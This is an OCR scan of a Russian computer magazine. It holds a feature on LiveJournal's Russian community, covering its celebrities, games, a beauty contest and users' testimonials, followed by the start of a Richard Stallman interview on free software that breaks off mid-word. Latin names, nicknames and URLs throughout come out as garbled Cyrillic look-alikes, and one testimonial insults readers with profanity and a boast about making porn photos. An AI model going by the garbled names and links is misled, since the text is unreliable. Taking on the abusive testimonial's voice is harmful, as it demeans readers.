в 2002 году начался настоящий бум ЖЖ в 
России. Дневники стали заводить все - от 
простых юзеров до сетевой элиты и знамени- 
тостей (Земфира, Тату, Сергей Лукьяненко). 

Птушко жж 

Люди приходят в ЖЖ разными путями и ис- 
пользуют его по-разному. Кто-то просто де- 
лится своими мыслями, обсуждая их с дру- 



гими. Кто-то тщательно описывает все собы- 
тия, произошедшие за день, чтобы через 
полгода-год повспоминать, поностальгиро- 
вать. Лично для меня ІіѵфигпаІ - стеб и цир- 
ковая арена. 

В любом случае, ЖЖ предоставляет от- 
личную возможность для общения и расши- 
рения круга знакомств. Читая чужие дневни- 
ки и добавляя авторов во френды, ты со 
временем знакомишься с ними поближе и 
зачастую это выливается в нечто большее, 
чем сетевой треп. 

В ЖЖ есть гибкая система настроек. Ты 
можешь менять внешний вид своего дневни- 
ка и аватара, указывать уровни доступа к 
своим постам, создавать разные френдленты 
и вообще извращаться как угодно. Большим 
достоинством ЖЖ является то, что в нем го- 
раздо больше взрослых, умных людей, чем в 
ш/ѵѵ-чатах и форумах. И найти братьев по 
разуму здесь проще простого - достаточно 
поискать по интересам или зайти в нужное 
сотгшпйу. Главный недостаток - огромное 
количество потраченного времени. Ведение 
своего дневника, чтение френд-ленты, учас- 
тие в спорах и ЖЖ-играх - все это отнимает 
КУЧУ времени, которое можно было бы ис- 
пользовать с большей пользой. Но в то же 
время все это чертовски интересно. 

Чем дольше ты ведешь свой дневник, тем 
больше у тебя становится читателей, что 
обычно сказывается на количестве коммен- 
тариев на твои посты. И поверь мне, жаркие 
дискуссии, происходящие в открытой тобой 
теме, будут волновать тебя не меньше, чем 
сочные груди соседки по парте. Кстати, жать 
с остервенением кнопочку «рефреш» совсем 
не обязательно - комменты могут приходить 
на специально отведенный для этого е-таіі. 

ЖЖ-юзеры не ограничивают себя только 
сетевым общением и постоянно встречаются 
в риаллайфе. В некоторых городах есть уже 
ставшие известными кафешки, где регуляр- 




ССЫПКИ П0ТЕИЕ 



ѵѵѵѵѵѵ.ііѵеіоигпаі.сот - официальный сайт 

Н«р://зетадіс.5оигсе^огде.пеѴіпсІех.НІтІ - лучший ЖЖ- 
клиент 

НПр://І].еопІіпе.ги - путеводитель по русскоязычному ІіѵеіоигпаІ 

ННр://Ц.сго55гоасІ5.ги - поисковик по русскоязычному ІіѵеіоигпаІ 

Шр://гипеІ.ЫдНѵѵау.ги/апаІШка/1 298.НітІ - 1 0 правил 
интересного поста 

ѵѵѵѵѵѵ.сііагу.ги - русский аналог ЖЖ (не дотягивает ну никак) 



но собирается народ. В Москве это «Пиро- 
ги», в Питере - «СаТе 2оот». Периодически 
также проводятся крупные сходки и пати, в 
которых принимают участие сотни ЖЖ-истов 
(например, московский ЖЖ-фестиваль 
электронной музыки «ІІрсІаІе Мизіс»). 

Несмотря на отмену инвайт-кодов и рост 
популярности ЖЖ, юзеры по-прежнему ощу- 
щают себя членами одной большой тусовки. 
И если два незнакомых человека узнают друг 
в друге пользователей ІіѵеіоигпаІ, то им, не- 
сомненно, будет о чем поговорить. 

А жж-эпитп 

Как и в любом другом сообществе, в ЖЖ 
есть свои знаменитости. Их добавляют во 
френды сотни и тысячи людей, народ ждет 
каждой новой записи. Кто-то снискал славу 
оригинальностью, кто-то - скандалами, неко- 
торые уже пришли известными. 

Одним из основных показателей принад- 
лежности кЖЖ-элите является количество 
френд-оффов. Френд-оффы - это люди, кото- 
рые добавили тебя в друзья и следят за пос- 
тингами в твоем жж. Понятное дело, людей, 
ведущих дневник в духе: «Пожрал. Посрал. По- 
ра баиньки», мало кто захочет читать. Поэтому 
элиту составляют незаурядные личности. 

Одним из самых известных ЖЖ-акгивистов 
является Арсений Апач Федорофф (ара^Гіе), 
скандально прославившийся еще по Фидо. 
Большой любитель пофлеймить и потравить 
бедных юзеров, пару лет назад он покинул Фи- 
до и полностью поселился в ЖЖ, где плодит в 
среднем по 1 0 постов в день. В основном это 
ссылки на занятные посты в других дневниках 
или сайтах с едкими комментариями. 

Самый читаемый русский ЖЖ-юзер - пи- 
сатель Горчев, блестящие литературные спо- 
собности и интересные посты которого 
привлекли почти 4000 френд-оффов. 

«Очень злая девочка» 2ІоеЬи4ка рассказыва- 
ет о своих сексуальных похождениях, в кото- 
рых мужикам достается одно лишь презрение. 

Фантаст Сергей Лукьяненко под ЖЖ-ни- 
ком сіосіогііѵзу делится подробностями о 
своей писательской жизни. 

Зкоііпа, добрейшей души кот, повествует 
о кошачьей жизни и ЭТИХ (своих хозяевах), 
разбавляя посты уже ставшей культовой 
фразой: «Нассал под кресло. Хорошо!». 

ОазГііпд выкладывает стебные фотки. 

ОоЫіп дада, завсегдатай и ведущий ко- 
лонки на иМ.сот, наяривает циничные за- 
метки обо всем. 

А известный сетевой деятель и главный ре- 
дактор Іепіа.ги Антон Носик (в ЖЖ - боІЬоеЬ) 
обозревает интересные события в рунете. 

Помимо этого, есть много забавных пер- 
сонажей, которые хоть и не относятся к ЖЖ- 
элите, но которых просто интересно читать. 
Если тебя интересуют стихи, ІІИІХ, профес- 
сиональные фотографии, пик-ап, машины 
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или любая другая тема - в ЖЖ есть куча спе- 
циализированных дневников, где обо всем 
этом пишут знающие люди. Хватает здесь и 
виртуалов, от Аллы Пугачевой до бомжа с 
соседнего вокзала. 

Помимо частных дневников, в ЖЖ есть 
тематические конференции (сотгшпйу), где 
народ совместно обсуждает ту или иную те- 
му. Самыми популярными являются: 
оМат сІагот (раздача слоников на халяву), 
абѵеііка (все, что касается рекламы, РП и 
маркетинга), тап ѵѵотап (о взаимоотноше- 
ниях мужчин и женщин), ги пакесіраііз (фот- 
ки обнаженных частей тела ЖЖ-юзеров), 
рарагаггі (эха для представителей СМИ), 
габоіа (объявы работодателей и работоиска- 
телей), ш_зех (разговоры об обмене физио- 
логическими жидкостями), ш _Ыо (профес- 
сиональные и не очень фотографии), 
пПгапзІаІе (с русского на любой и наобо- 
рот), ги_кйсІіеп (поваренная книга), дігІз_опІу 
(бабское царство) и другие. 

А ЖЖ-ЗПБПВЫ 

Жизнь в ЖЖ постоянно бурлит. Юзеры не 
устают придумывать себе новые забавы, в 
которых с удовольствием принимают участие 
другие ЖЖ-шники. 

Те, кто перевалил за 500 френд-оффов, 
неустанно борются за первые места в рей- 
тингах (Шр:/Лор.орепе{1и.ги/гаШдЛаЫе.$ІііпІ?Ьг=9). 
Здесь это называется «пиписькометрией». 
Повысить количество посещений можно ка- 
кой-нибудь интересной акцией или провока- 
ционным постом, на который будут ссылать- 
ся другие юзеры. 

По сей день большой популярностью 
пользуются ЖЖ-тесты. «Что тебе лучше 
пить?», «Какое ты дерево?», «Какого цвета ты 
мусоропровод?» - это лишь малая часть тес- 
тов, которые придумали сами ЖЖ- юзеры и 
которыми страдают новички. Пройти любой 
из них или написать свой можно на ѵѵѵѵѵѵ.аеіег- 
па.ги/сді-Ьіп/таіпа.сді?раде=№. Впрочем, у боль- 
шинства пользователей и те, кто вставляет 
в свои дневники результаты тестов, вызыва- 
ют лишь раздражение и незамедлительно 
вычеркиваются из списка френдов. 

Одной из старейших забав является лжек- 
раш: Шр://І[еопІіпе.ги/сги$Іі. Благодаря ему мож- 
но анонимно выразить свое отношение к лю- 
бому ЖЖ-юзеру или узнать, что о тебе дума- 
ют другие. 

Много шуму наделала игра «Колбаса». 
Правила в ней были совершенно тупые - 
нужно ввести ник в форму и насладиться ви- 
дом паровозика, состоящего из тебя и пре- 
дыдущих юзеров. Но скучающие ЖЖ-шники 



повелись и на такое, в итоге оказалось, что 
автору скрипта отсылались пароли аккаунтов 
всех юзеров, кто принял участие. 

Год назад большой популярностью поль- 
зовалась игра «5 вопросов». ЖЖ-юзеры спра- 
шивали своих френдов о разных нелепостях, 
эстафету подхватывали другие, и очень быст- 
ро игра стала массовой. Затем кто-то запос- 
тил в свой ЖЖ скриншот десктопа, народу 
идея понравилась, и ленты быстро раздулись 
от картинок виндошных волпаперов. 

Многие подхватили инициативу писать 
100 фактов о себе. Народ вдохновенно вы- 
писывал длинные подробности о своей жиз- 
ни и выкладывал на обозрение френдам. 

Еще была игра «Возьми ближайшую к тебе 
книгу, открой 1 8-ю страницу и процитируй у 
себя в дневнике, что написано в 4-й строке». 

В конце 2003 года ЖЖ-исты провели 
большой всеЖэЖэшный флешмоб, во время 
которого объявили себя Таней Лаврухиной. 
Событие было посвящено реальному флеш- 
мобу, который проводился в Москве и Пите- 
ре (народ встречал на вокзалах с плакатами 
мифическую алкоголичку Таню Лаврухину). 

В последнее время популярны две массо- 
вые ЖЖ-забавы: «Знаменитости, читающие 
вас» (читатели твоего дневника сортируются 
по категориям, в зависимости от количества 
френд-оффов, и подаются в виде таблицы. 
См. здесь: Шр://доЫіп-дададі/Іі.рІір) и составле- 
ние цветка из френдов 
(Шр:/Дипег.ЬеІіоІсІег.гиЛе$№.рІір). 

Ваш покорный циник тоже успел отме- 
титься. На момент написания этой статьи я 
закинул в главное халявное комьюнити сооб- 
щение: «Тому, кто пришлет определенный по 
счету коммент на этот пост, отдам даром 
1000 рублей. Актуально до 500 поста». Ре- 
зультат лотереи ты можешь посмотреть 
здесь: ѵѵѵѵѵѵ.ііѵеіоигпаі.сот/соттипііу/ 
оМап^агот/1047768.МтІ 

А МИСС ЖЖ 

Полгода назад был в русском ЖЖ довольно 
популярный персонаж - зкеіеігоп. Богатень- 



кий Чебурашка с несколькими крутыми тач- 
ками в гараже и женой-пуэрториканкой. В 
ЖЖ обычно рассказывал о своей безбедной 
жизни, чем привлекал толпы зевак. 

Скелетрон пытался всячески привлечь чи- 
тателей и оставить след в ЖЖ-сообществе. 
Поднимал шумные треды, пиарился в раз- 
ных комьюнити. Но самым памятным его 
действом стала организация конкурса красо- 
ты «ги_тІ55» среди русских ЖЖ-исток. 

Так как за победу в конкурсе обещали 
штуку баксов, местных красавиц упрашивать 
не пришлось. Всего в мероприятии приняло 
участие 35 девушек из 5 стран. 

В качестве жюри выступили ЖЖ-пользо- 
ватели. В первом туре нужно было оценить 
каждую красотку по десятибалльной систе- 
ме, во втором - отдать балл понравившимся 
мадамам, и в конце был финал, где каждый 
выбирал одну претендентку. 

Без эксцессов не обошлось. Поклонники 
некоторых девочек заводили виртуалов и от 
их имени голосовали. Дамочки тоже не 
скромничали и голосовали сами за себя. Па- 
ру участниц чуть не сняли с дистанции за 
накрутку, две ушли самостоятельно, объя- 
вив, что не хотят мараться в грязи. 

Высказать свое мнение о конкурсе и аги- 
тировать народ голосовать за ту или иную 
участницу посчитал своим долгом практи- 
чески каждый юзер. Поэтому с ноября по 
декабрь 2003 года, когда проходил ги_тІ55, 
русскоязычное ЖЖ жило по сути одним 
большим событием. По дневникам ходили 
забавные перлы с красавицами в главной 
роли. Например, кто-то подобрал фотки зна- 
менитостей, похожих на некоторых девиц как 
две капли, и запостил в своем дневнике ря- 
дом с оригиналами. Популярные ЖЖ-юзеры 
шутки ради подбивали голосовать не за са- 
мую красивую, а за самую юную (была там 
маленькая девочка с медведем). 

7 декабря стали известны имена фина- 
листок. Финал и награждение состоялись 14 
декабря в одном московском клубе, где соб- 
ралось около 50 человек. 




| Флэшмоб, посвященный Тане Лаврухиной 



жж-коиьюнити 

С ейчас ІіѵеіоигпаІ-комьюнити является одним из крупнейших 
интернет-сообществ. Дневники ведут более 4 миллионов че- 
ловек, примерно 1,3 миллиона делают обновления регулярно. 
Большинство ЖЖ-шников находится в возрасте от 1 8 до 25 лет, 
2/3 из них - девушки. Наибольшей популярностью сервис поль- 
зуется в англоязычных странах, особенно США. В стране свобо- 
ды и чизбургеров почти 2 миллиона дневников, в то время как в 
России - 67 тысяч. И их количество непрерывно растет. 
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30 СТЕКЛОМ 



А МНЕНИЯ 

Перед тем как ты отправишься создавать се- 
бе аккаунт на ІіѵеіоигпаІ.сот, предлагаю тебе 
ознакомиться с мнением людей, которые ве- 
дут дневники уже не первый месяц. Каждому 
из них я предложил рассказать, как он попал 
в ЖЖ, что в него пишет, какие у сервиса 
достоинства и недостатки и какие были па- 
мятные случаи из ЖЖ-жизни. 

Ник в ЖЖ: кізза, имя: Ксюша, возраст: 
25, кто есть: парламентский журналист. 

Я пришла в ЖЖ больше трех лет назад, в 
апреле 2001 года. Тогда русскоязычных юзе- 
ров было всего около 400, и все они числи- 
лись во френдах юзера Тота. Он был кем-то 
вроде собирателя земель русских. О ЖЖ уз- 
нала от своего молодого человека, который 
завел себе журнал, постил туда всякую ерун- 
ду типа «пописал, покакал, покушал, поду- 
мал» и радостно присылал мне ссылки на 
посты по аське. Смысл этого действа оста- 
вался мне неясен. И вот, чтобы попытаться 
понять своего молодого человека, я тоже за- 
вела ЖЖ. В итоге, мой парень удалил жур- 
нал, я же, наоборот, втянулась и обросла 
Френдами. Со временем я стала замечать, 
что мой дневник читает все больше и боль- 
ше знакомых. Тогда я перестала писать о 
своих мрачных настроениях и личных делах. 
Стараюсь выдавать побольше позитива и 
юмора. Часто пишу о своей работе в Госду- 
ме, поскольку многим это интересно. Тут во- 
обще подобралась большая компания моих 
друзей - политических журналистов, так что 
ЖЖ для меня еще и средство коммуникации 
с друзьями. Само собой, существенно вырос 
круг общения, повстречала много приятных 
и не очень людей. Хочу также отметить одно 
важное преимущество ЖЖ перед всякими 
форумами. Поскольку ты ведешь свою стра- 
ничку, это вроде как твоя личная террито- 
рия, и если кто-то придет к тебе гадить, ты 
можешь его попросту забанить. Да и вооб- 
ще, устанавливаешь свои законы. Как глав- 
ный редактор маленького СМИ с устойчивой, 
однако, аудиторией. 

Ник в ЖЖ: оіЛсотег, имя: Максим, воз- 
раст: 28, кто есть: дизайнер. 

ЖЖ появился после одной поездки. У меня 
много друзей, и после возвращения меня 
буквально засыпали вопросами по ІСО: «Как 
съездили?», «Ну как там?». Я подумал, что бу- 
дет удобнее написать развернутый отчет о 
поездке, выложить его в Сети и в ответ на 
все вопросы давать ссылку на этот отчет. От- 
чет получился в дневниковой форме, и я его 
решил разместить в ЖЖ. Собственно, так все 
и началось. Дневник использую для высказы- 
вания мыслей вслух, из серии: «Мне тут поду- 
малось вот что...», и в качестве удобной дос- 
ки объявлений. У большинства моих друзей 
есть ЖЖ, и если я хочу донести до них какую- 
то информацию или задать вопрос сразу 
всем моим друзьям, я пишу об этом в ЖЖ. 

Достоинства ЖЖ: О. Удобная форма ком- 
муникации. Если мне надо созвать всех дру- 
зей на день рождения, я напишу об этом в 
ЖЖ и отправлю ссылку на эту запись тем, 
кто мой журнал не читает. О. Отличный спо- 
соб расширить свой круг общения. Я позна- 
комился со многими интересными людьми 
благодаря ЖЖ, в том числе с теми, кто в си- 
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лу своей занятости не светится в форумах и 
чатах. Если бы не ЖЖ, мы просто никогда не 
узнали друг о друге. Ѳ. ЖЖ позволяет эко- 
номить время. Я могу фильтровать ту ин- 
формацию, которая будет доходить до меня, 
и оставлять только самое интересное. 

Недостатки ЖЖ: О. С отменой клубной 
системы в ЖЖ стало ощутимо больше спама. 

О. Отсутствие удобной системы поиска. 
Есть, правда, ЖЖ-поисковик у.сгоззгоабз.ги, ко- 
торый существенно упрощает жизнь. 

Из памятных случаев - недавний секрет- 
ный концерт группы «Аукцыон», о котором я 
узнал из ЖЖ. Ну и, конечно же, знакомство с 
моей девушкой :). 

Ник в ЖЖ: дпоіг, возраст: 24, кто есть: 
не обремененный работой ушлепок. 

Дневник завел в 2002 году, этот уже тре- 
тий по счету. Оба предыдущих удалила 
служба поддержки и за Ііаггазтепі - издева- 
тельство над другими ЖЖ-юзерами. Пишу о 
своей ненависти к таким дебилам, как ты и 
все читатели этого е**ного журнала. Иногда 
вывешиваю фотографии девочек, с которым 
дружу. Опять же, чтобы таким ****, как ты, 
было завидно. Главное достоинство - воз- 
можность засрать какому-нибудь позитивно- 
му дебилу его позитивный неадекват, недос- 



таток - на 99% ЖЖ состоит как раз из таких 
неадекватных дегенератов. Самое памятное 
событие - недавняя ЖЖ-тусовка сиггепі 
тизіс, после которой я привел домой двух 
рипк-дігіз и наделал порно-фотографий. 

Ник в ЖЖ: Іоха, имя: Антон, возраст: 20, 
кто есть: админ, автор статей в ][. 

ЖЖ у меня появился весной 2002 года. 
Тогда это только набирало популярность и 
не было такой попсой ;-). Помнится, тогда 
новой игрушкой интересовались многие пат- 
риархи рунета, которые впоследствии забро- 
сили эту забаву (Тема Лебедев, например). 

Я пишу то, что в данный момент на уме. Не 
продумываю посты, не сочиняю историй. 
Например, встретилось забавное письмо 
лемминга в списках рассылки орепЬзсІ - я 
публикую его в ЖЖ, чтобы народ посмеялся. 
Еще регулярно пишу о том, что все уроды, а 
мир - отстой, как же без этого :). Я считаю, 
что ЖЖ - это еще один вид долгоиграющего 
наркотика, как ІНС, например. Но если в ІНС 
можно достойно общаться, то здесь все идет 
в одном направлении - самовыражение. 90% 
людей, пишущих в ЖЖ, - тщеславные лич- 
ности, которые нашли единственный способ 
быть хоть кем-то услышанными. 

Ник в ЖЖ: рагосііуа, имя: неизвестно, 
возраст: неизвестен, кто есть: хрен поймешь. 

ЖЖ у меня появился около полугода на- 
зад после долгих уговоров моих друзей. С 
самого начала существования дневника я 
постил в нем, в основном, не свои пережи- 
вания и чувства, а что-нибудь смешное, да- 
бы поднять настроение своим френдам. 
Причем я не занимался банальной перепе- 
чаткой чужих анекдотов и шуток, а пытался 
креативить. И если уж брался тереть за 
жизнь, то это всегда было весело и задор- 
но. Даже когда я завалил экзамен или когда 
меня бросила девушка, это подавалось в 
юморной форме. Одновременно и достоин- 
ство, и недостаток ЖЖ - это время. Время, 
которое затрачивает человек, чтобы прочи- 
тать все комментарии, ответить на нужные и 
пробежаться по френдленте. ЖЖ - это одна 
большая книга, которую, казалось бы, вот- 
вот дочитываешь, - и тут открывается еще 
500 страниц неизведанного. Еще есть такая 
интересная штука, как рейтинг и журналов. 
Недавно я посмотрел на топ- 10 самых чита- 
емых людей и задался целью попасть туда. 
Причем попасть честным образом, а не ба- 
нальной накруткой посетителей. Стал я ду- 
мать, чем же можно заинтересовать людей, 
множество людей! И придумал. Ведь можно 
сочинять пародии на самых известных ЖЖ- 
шников либо на их отдельные посты, тем 
самым по-доброму высмеивая слабые сто- 
роны звезд. Каждый мой текстовый закос 
выдержан в стиле пародируемой жертвы с 
точностью до знаков препинания, смайлов и 
даже ругательств :). Первым я выбрал чува- 
ка, который раньше много и часто писал о 
сексе с девушками, можно сказать, это была 
его мания. Теперь у -юзер рагосііуа находит- 
ся в десятке самых читаемых каждый день. 
Люди ждут интересные пародии, а некото- 
рые надеются увидеть в моем журнале себя. 
Конечно, иногда получаются не очень смеш- 
ные переделки, я тоже человек, да и всем 
не угодить. Но я стараюсь. И мне нравится 
веселить и радовать людей. Ц-Ц 
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И ир програниного обеспечения разделен на три части: свободное ПО ((гее), открытое (ореп зоигсе) и собственническое (рюргіеіагу). 
Собственническими являются все программы, которые поставляются без исходников и оставляют юзеру только одно право - запускать 
их. Сюда входят практически все популярные продукты: N8 ИЫошз с офисом, ТНе Ваі!, ИІіпНПН и т.д. Свободный называется ПО, 
которое можно не только запускать, но и изучать исходный код, изменяя его по своему желанию, распространять копии, а также выпускать 
модифицированные версии. 



ИНТЕРВЬЮ С ОТЦОМ СВОБОДНОГО пв 




З ти четыре права составляют 
философию свободного ПО. 
Сюда относятся все програм- 
мы, распространяемые под ли- 
цензией СІМІІ СРІ_ и некоторы- 
ми другими свободными ли- 
цензиями. Открытый софт 
имеет много общего со сво- 
бодным. Главное отличие в том, что, хотя 
четыре права и предоставляются его пользо- 
вателям, основополагающими они не явля- 
ются. Философия свободного ПО часто отпу- 
гивает крупный бизнес, так как разработчик 
не имеет полного контроля над своим прог- 
раммным продуктом. 

Визитной карточкой свободного ПО явля- 
ется Ричард Столлман, отец-основатель дви- 
жения за свободное ПО (Ргее ЗоЙѵѵаге 
Моѵетепі) и президент Фонда свободного 
ПО (Ргее ЗоЙѵѵаге Роипбайоп). Он является 
лицом ОМ II, он разработал целый ряд попу- 
лярных проектов под ІІІМІХ (своими руками 
писал Етасз, СЮВ, ОСС и многое другое). 
Столлман - яростный агитатор за свободное 
ПО и просто фанатик своего дела. 

Закончив Гарвард в 1974 году, Ричард полу- 
чил степень бакалавра по физике. Примерно в 
это же время занимался разработкой операци- 
онной системы в Лаборатории искусственного 
интеллекта в Массачусетском технологическом 
институте. В 1980-ые годы начал писать прог- 
раммы ОМІІ. В 1985 году основал Фонд сво- 



бодного ПО, чтобы собрать деньги для прод- 
вижения ОМІІ. Сегодня этот Фонд финансиру- 
ет многие свободные проекты. 

Само движение за свободное ПО роди- 
лось в 1983-1984 годах. К 1990 году оно 
набрало небывалую силу: система ОМІІ была 
разработана почти полностью, не хватало 
только ядра. К тому времени Линус Тор- 
вальдс уже написал ядро І_іпих, и оно оказа- 
лось востребованным в РЗМ, потому что все 
остальные части ОС ОМІІ уже были написа- 
ны. Историки часто упускают этот факт из 
виду, но система, которая стала популярна в 
1990-х годах, была больше ОМІІ, чем І_іпих, 
и имя ОМІІ/ипих (а не просто І_іпих) подхо- 
дит ей намного лучше. Сейчас есть система 
ОМІІ/НІІВО, отличающаяся от ОМІІ/ипих 
лишь ядром. Правда, по функциональности 
ядро Н II ВО до Шпих не дотягивает. 

Движение за открытое ПО возникло в 1 998 
году из движения за свободное ПО. Причин, 
по которым свободное сообщество создало 
новый лагерь - открытое сообщество, нес- 
колько. Основная официальная причина в 
том, что в английском языке слово «Ргее» оз- 
начает не только «свободное», но и «бесплат- 
ное». Сегодня, чтобы подчеркнуть, что ПО 
является бесплатным, говорят «іего-созі» и 
«{гее о{ сМагде». Но в определениях свобод- 
ного и открытого ПО слова «бесплатно» ниг- 
де нет. Бесплатным может быть любое ПО, 
даже собственническое, и никто не заставля- 



ет разработчиков свободного и открытого ПО 
отдавать свои труды безвозмездно. Чтобы 
уйти от двусмысленности слова «{гее», было 
решено заменить его на «ореп зоигсе». 

Есть и другая, более правдоподобная вер- 
сия. Проработав долгое время над свободны- 
ми проектами, многие разработчики стали 
сознавать, что философия свободы (которая 
сама по себе не так уж плоха) только мешает 
заработать деньги и привлечь крупные инвес- 
тиции. Ричард Столлман и все его сообщест- 
во уделяют основное внимание правам поль- 
зователя по работе со своим софтом, все ос- 
тальное - на втором плане. Но чтобы делать 
бизнес в наши дни, нужны гибкие условия и 
уверенность в своем будущем. Позиция Ри- 
чарда не допускает каких-либо компромис- 
сов: ПО либо свободное, либо нет. Напри- 
мер, свободным дистрибутивом ОМІІ/ипих 
может являться лишь тот дистрибутив, в ко- 
торый не входит ни одного собственническо- 
го пакета. Открытое сообщество быстро из- 
бавилось от слабости своего старшего брата: 
оно идет на компромиссы и допускает комби- 
нирование любого ПО в одном дистрибутиве. 

Свободное сообщество и лично Ричард 
Столлман не считают открытое сообщество 
своим врагом. Они относятся к движению за 
открытое ПО, как к конкуренту, пытающему- 
ся похоронить свободную философию под 
красивыми бизнес-лозунгами. Впрочем, отк- 
рытое сообщество принесло компьютерному 
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миру больше пользы: почти все успешные 
сегодня дистрибутивы ОМІІ/Шпих являются 
открытыми (в них есть собственнические па- 
кеты). Сегодня открытое ПО нашло поддерж- 
ку многих крупных компаний: ІВМ, МоѵеІІ, 

Іпіеі и других. Крупные сборщики ПК и сер- 
веров феІІ и НеѵѵІей-РаскагсІ, например) ус- 
танавливают открытое ПО на свои продукты. 

^разговор с ричордои 
стоппипнои 

Кстати, Линус Торвальдс является завзятым 
«открыто-исходником». Он не разделяет 
взглядов Ричарда Столлмана на свободное 
ПО, вероятно, поэтому оба пытаются игно- 
рировать существование друг друга. 

Чтобы ты мог составить впечатление о ми- 
ре и философии свободного ПО из первых 
рук, мы связались с Ричардом Столлманом и 
он согласился поделиться своими мыслями. 

Алексей (А): Ричард, расскажите, пожа- 
луйста о себе. 

Ричард Столлман (РС): Я живу в Кемб- 
ридже, штат Массачусетс, США. Хотя могу, в 
принципе, жить и в любом другом месте. 
Большую часть своего времени я провожу в 
поездках и выступлениях (рассказывая, есте- 
ственно, о свободном ПО), так что чувства 
собственного дома у меня нет. 

Я не женат, имею одного ребенка - дви- 
жение за свободное ПО. Сейчас ему уже 20 
лет. Домашних животных у меня нет. Я бы 
хотел завести попугая, если бы смог разре- 
шить ему летать по дому везде, где он захо- 
чет, и не держать его в клетке. Но с моим 
образом жизни это невозможно. 

А: Почему Ваше имя обычно является си- 
нонимом по отношению к словам: «свобод- 
ное ПО», «ОШ ОРЬ>, а иногда и «ОМІІ»? 

РС: Наверное, потому, что я основал дви- 
жение за свободное ПО и первым начал раз- 
работку операционной системы ОМІІ. Но бы- 
ло бы неправильно отождествлять эти поня- 
тия и мою личность, ведь над ОМІІ работали 
тысячи людей и многие из них являются сто- 
ронниками свободного ПО. 

А: Где Вы сейчас работаете, и в чем сос- 
тоит Ваша работа? 

РС: Моя работа - распространять фило- 
софию свободного ПО. 

А А кто Вам платит за это? 

РС: Большую часть времени я работаю 
бесплатно, но примерно половина моих выступ- 
лений на публике оплачивается. Этого вполне 
хватает для жизни. У меня нет собственного до- 
ма и своей машины - они мне не нужны. Я живу 
в городе, в нем есть автобусы и метро. Так что 
я быстро попадаю туда, куда мне нужно. 

А: Можно ли утверждать, что свободное 
ПО и ПО, распространяемое под лицензией 
ОМІІ ОРІ_, - это одно и то же? 

РС: Каждая лицензия, которая не наруша- 
ет четырех основных свобод, является ли- 
цензией для свободного ПО. ОМІІ ОРІ_ - это 
самая часто используемая лицензия для сво- 
бодного ПО. Но существует еще целый ряд 
лицензий, уважающих четыре основных сво- 
боды: лицензия X1 1 , старая и переработан- 
ная лицензия ВЗО, МогіІІа РиЫіс Шсепзе и 
лицензия АрасГіе. Полный список таких ли- 



цензий представлен по адресу 

ѵѵш.дпи.огд/Іісеп$е5/Іісеп$е-Іі$иііпІ. 

А: Свобода номер 1 (не ноль) позволяет 
изучать исходный код и изменять его по сво- 
ему желанию. Но многим ли это нужно? Есть 
ли на это спрос? 

РС: Конечно, есть! По меньшей мере, это 
сотни тысяч пользователей ОІ\ИІ/І_іпих. Воз- 
можно, даже миллионы. Посмотрите, напри- 
мер, сколько людей копаются в своих автомо- 
билях и сами их ремонтируют. Точно так же 
для пользователей ПК потенциально важно 
иметь возможность копаться в программах. 

А Но ведь многие пользователи вообще 
не хотят копаться в программах! Более того, 
это им не только не нужно, но они и не уме- 
ют это делать! 

РС: Никто не станет из-под палки принуж- 
дать пользователей изучать исходные коды 
свободных программ. Можно просто запус- 
кать программы и не вникать в то, как они ра- 
ботают. Но если кто-то захочет разобраться в 
этом вопросе, ему просто надо будет нау- 
читься программированию самому или нанять 
опытного преподавателя. В любом случае, че- 
ловек должен иметь свободу изучать код. 

А Я говорил об офисных служащих, бух- 
галтерах, секретарях, обычных домашних 
пользователях и т.д. 

РС: Здесь не могу с вами согласиться. 
Многие люди из названных категорий не ин- 
тересуются программированием, но некото- 
рые из них (а единицы уж точно) весьма 
неплохо знакомы с разработкой программ. 
Понимаете, из того, что кто-то является бух- 
галтером или секретаршей, вовсе не следу- 
ет, что этот человек глуп или ограничен в 
своих интересах. Собственнические прог- 
раммы просто игнорируют потребности 
пользователей, а свободное ПО дает вам 
свободу. При желании вы можете воспользо- 
ваться ею. Не каждый копается в исходных 
кодах, точно так же, как не каждый пишет 
статьи. Тем не менее, все наше общество 
выигрывает от свободы изменять исходный 
код программ точно так же, как все мы выиг- 
рываем от свободы высказывать свое мне- 
ние в СМИ. Все мировое сообщество стра- 
дает, когда свобода в какой-либо сфере че- 
ловеческой жизни ущемлена. Сегодня это 
относится и к США, и к России. 

А В чем заключается философия свобод- 
ного ПО? 

РС: Философия свободного ПО в том, что 
все компьютерные пользователи должны 
иметь свободу распространять и полностью 
контролировать то ПО, которое они исполь- 
зуют. Если быть более точным, то речь идет 
о четырех основных свободах. Наш лозунг: 
«Свобода и общество». 

А: Вы принимаете свою работу близко к 
сердцу? 

РС: Я бы не стал называть это работой, 
так как работа - это что-то, что вы делаете за 
деньги. То, чем занимаюсь я, является, ско- 
рее, миссией. Когда я говорю, что движение 
за свободное ПО - этой мой ребенок, то шучу 
лишь отчасти. 

А А какие у Вас сейчас отношения с ОМІІ? 



РС: Я по-прежнему являюсь главным 
ОІМІІ-шником и управляю разработкой про- 
ектов. Хотя разработка пакетов ОМІІ, в ос- 
новном, ведется независимо от меня. 

А: Как Вы относитесь к лицензиям ВЗО? 

РС: Обе лицензии ВЗО являются лицен- 
зиями для свободного ПО. Но старая лицен- 
зия была несовместима с ОМІІ ОРІ_ из-за од- 
ного рекламного пункта. В переработанной 
лицензии этот пункт исчез, поэтому она пол- 
ностью совместима с ОРІ_. Обе лицензии 
ВЗО являются примерами простых не-сору- 
ІеЙ лицензий для свободного ПО. Я бы не 
рекомендовал кому-нибудь выпускать прог- 
раммы и распространять их без соруіей, так 
как любой посредник сможет урезать свобо- 
ду и распространять код дальше. 

А: Какие у Вас отношения с разработчика- 
ми Ргее\МеДОрепВЗО? Я слышал, что Вы не- 
долюбливаете Линуса Торвальдса. Это так? 

РС: С разработчиками *ВЗЭ я очень ред- 
ко общаюсь. Что касается Торвальдса, мы 
разговаривали друг с другом всего несколь- 
ко раз. У нас оказались очень разные поли- 
тические взгляды. Я критикую его за откры- 
тое использование несвободного ПО в раз- 
работке ядра І_іпих. 

А: Уже давно нет никаких новостей от 
ЗСО. Вся эта эпопея уже закончилась? Как 
Вы считаете? 

РС: Я всегда говорил, что угрозы ЗСО боль- 
шого эффекта не произведут. Гораздо более 
опасны патенты на ПО. Я провожу много пуб- 
личных выступлений в Европе, чтобы помочь 
кампании против патентов на ПО в Евросоюзе. 

А В чем именно Вы видите опасность? 

РС: Чтобы написать большую программу, 
требуется объединить очень много идей. Ес- 
ли любую идею можно будет запатентовать, 
то каждый, кто напишет большую программу 
(и даже те, кто ее использует!), нарушит па- 
